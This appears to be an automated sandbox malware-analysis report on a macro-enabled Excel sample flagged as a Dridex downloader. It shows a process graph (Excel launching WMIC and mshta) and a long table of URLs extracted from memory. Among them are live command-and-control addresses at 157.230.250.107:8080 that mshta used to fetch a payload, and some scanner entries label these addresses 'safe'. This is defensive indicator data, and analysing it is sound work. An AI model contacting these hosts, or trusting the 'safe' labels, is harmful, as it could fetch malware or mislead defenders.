      behaviorgraph top1 signatures2 2 Behavior Graph ID: 532311 Sample: 56449657.xlsm Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 29 Multi AV Scanner detection for submitted file 2->29 31 Sigma detected: TA505 Dropper Load Pattern 2->31 33 Yara detected Dridex Downloader 2->33 35 7 other signatures 2->35 7 EXCEL.EXE 26 23 2->7         started        11 WmiPrvSE.exe 2->11         started        process3 file4 21 C:\Users\user\Desktop\~$56449657.xlsm, data 7->21 dropped 23 C:\Users\user\Desktop\56449657.xlsm (copy), Microsoft 7->23 dropped 25 C:\ProgramData\vqcMnINBAOOJC.rtf, HTML 7->25 dropped 37 Creates and opens a fake document (probably a fake document to hide exploiting) 7->37 13 WMIC.exe 1 7->13         started        16 mshta.exe 11->16         started        signatures5 process6 dnsIp7 39 Creates processes via WMI 13->39 19 conhost.exe 13->19         started        27 157.230.250.107, 49826, 8080 DIGITALOCEAN-ASNUS United States 16->27 signatures8 process9

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      56449657.xlsm13%ReversingLabsDocument-Word.Trojan.Heuristic

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf90%Avira URL Cloudsafe
      http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e&-0%Avira URL Cloudsafe
      https://cdn.entity.0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://api.aadrm.com60%Avira URL Cloudsafe
      http://schemas.open0%URL Reputationsafe
      https://incidents.diagnosticssdf.office.comZ0%Avira URL Cloudsafe
      https://api.aadrm.com/0%URL Reputationsafe
      http://157.230.250.107:8080/BAOOJC.rtfR0%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://officeci.azurewebsites.net/api/0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://api.cortana.aip0%Avira URL Cloudsafe
      https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
      http://157.230.250.107:8080/mfkrmotherfu0%Avira URL Cloudsafe
      http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf0%Avira URL Cloudsafe
      https://substrate.office.comb0%Avira URL Cloudsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://substrate.office.comP0%Avira URL Cloudsafe
      https://outlook.office.com(0%Avira URL Cloudsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://api.diagnosticssdf.office.comU0%Avira URL Cloudsafe
      https://dataservice.o365filter0%Avira URL Cloudsafe
      http://157.230.250.107:8080/mfkrmothR0%Avira URL Cloudsafe
      https://dataservice.protection.outl0%Avira URL Cloudsafe
      http://157.230.250.107:8080/mfkrmother0%Avira URL Cloudsafe
      http://157.230.250.107:8080/mfkrmotherfucke0%Avira URL Cloudsafe
      https://cortana.aiZ0%Avira URL Cloudsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      http://157.230.250.107:80%Avira URL Cloudsafe
      http://157.230.250.10e0%Avira URL Cloudsafe
      https://api.cortana.ai0%URL Reputationsafe
      https://dataservice.o365filtering.compDy0%Avira URL Cloudsafe
      https://staging.cortana.ai0%URL Reputationsafe
      http://157.230.250.107:8080/mfkrmotherfuckeru6y82saSM0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9mshta.exe, 00000011.00000003.857778956.00000269D54DB000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.928170505.00000269D54DB000.00000004.00000020.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://shell.suite.office.com:1443EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
        high
        http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e&-mshta.exe, 00000011.00000003.857834199.00000269D553C000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://autodiscover-s.outlook.com/EXCEL.EXE, 00000000.00000002.933997365.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782673322.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662745522.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787123980.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743580229.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807929408.000000001328A000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
          high
          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrEXCEL.EXE, 00000000.00000002.933545976.0000000013026000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
            high
            https://cdn.entity.7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
            • URL Reputation: safe
            unknown
            https://login.windows.net/common/oauth2/authorizeQR8EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpfalse
              high
              https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933748369.0000000013149000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                high
                https://rpsticket.partnerservices.getmicrosoftkey.com7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                • URL Reputation: safe
                unknown
                https://lookup.onenote.com/lookup/geolocation/v1EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                  high
                  https://api.aadrm.com6EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.openEXCEL.EXE, 00000000.00000003.786918474.0000000016269000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787015034.000000001606A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.784409991.0000000016069000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.781717569.00000000161F9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.781858345.00000000162B1000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                    high
                    https://incidents.diagnosticssdf.office.comZEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyEXCEL.EXE, 00000000.00000003.787102445.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807889222.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662721741.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933958853.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782581219.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743536985.000000001325D000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                      high
                      https://api.aadrm.com/EXCEL.EXE, 00000000.00000002.933997365.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782673322.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662745522.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787123980.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743580229.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807929408.000000001328A000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                      • URL Reputation: safe
                      unknown
                      http://157.230.250.107:8080/BAOOJC.rtfRmshta.exe, 00000011.00000002.928213340.00000269D5515000.00000004.00000020.sdmp, mshta.exe, 00000011.00000003.857806201.00000269D5515000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://login.windows.net/common/oauth2/authorizeBREXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpfalse
                        high
                        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesEXCEL.EXE, 00000000.00000002.933931227.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782557094.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807864897.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662707230.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787086454.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743519317.0000000013235000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                          high
                          https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppEXCEL.EXE, 00000000.00000002.933545976.0000000013026000.00000004.00000001.sdmpfalse
                            high
                            https://api.microsoftstream.com/api/EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                              high
                              https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                high
                                https://cr.office.comEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                  high
                                  https://res.getmicrosoftkey.com/api/redemptioneventsEXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://tasks.office.comEXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                    high
                                    https://officeci.azurewebsites.net/api/7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://purl.oclc.org/ooxml/drawingml/tablewEXCEL.EXE, 00000000.00000002.930150892.000000000DA06000.00000004.00000001.sdmpfalse
                                      high
                                      https://login.windows.net/common/oauth2/authorize?REXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpfalse
                                        high
                                        https://graph.ppe.windows.net/2EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpfalse
                                          high
                                          https://store.office.cn/addinstemplateEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://api.powerbi.com/v1.0/myorg/groups(EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                            high
                                            https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                              high
                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksBEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                high
                                                https://www.odwebp.svc.msEXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://api.cortana.aipEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://api.powerbi.com/v1.0/myorg/groupsEXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                  high
                                                  https://web.microsoftstream.com/video/EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                    high
                                                    https://api.addins.store.officeppe.com/addinstemplateEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-132EXCEL.EXE, 00000000.00000003.787102445.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807889222.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662721741.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933958853.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782581219.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743536985.000000001325D000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://graph.windows.netEXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                        high
                                                        http://157.230.250.107:8080/mfkrmotherfumshta.exe, 00000011.00000002.928213340.00000269D5515000.00000004.00000020.sdmp, mshta.exe, 00000011.00000003.857806201.00000269D5515000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehfmshta.exe, 00000011.00000003.857778956.00000269D54DB000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.928170505.00000269D54DB000.00000004.00000020.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://substrate.office.combEXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                          high
                                                          https://ncus.contentsync.EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://login.windows.net/common/oauth2/authorizeV_?EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                              high
                                                              http://weather.service.msn.com/data.aspxEXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                high
                                                                https://substrate.office.comPEXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                  high
                                                                  https://login.windows.net/common/oauth2/authorizeHT1EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlEXCEL.EXE, 00000000.00000003.787102445.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807889222.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662721741.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933958853.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782581219.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743536985.000000001325D000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drfalse
                                                                      high
                                                                      https://login.windows.net/common/oauth2/authorizebEXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpfalse
                                                                        high
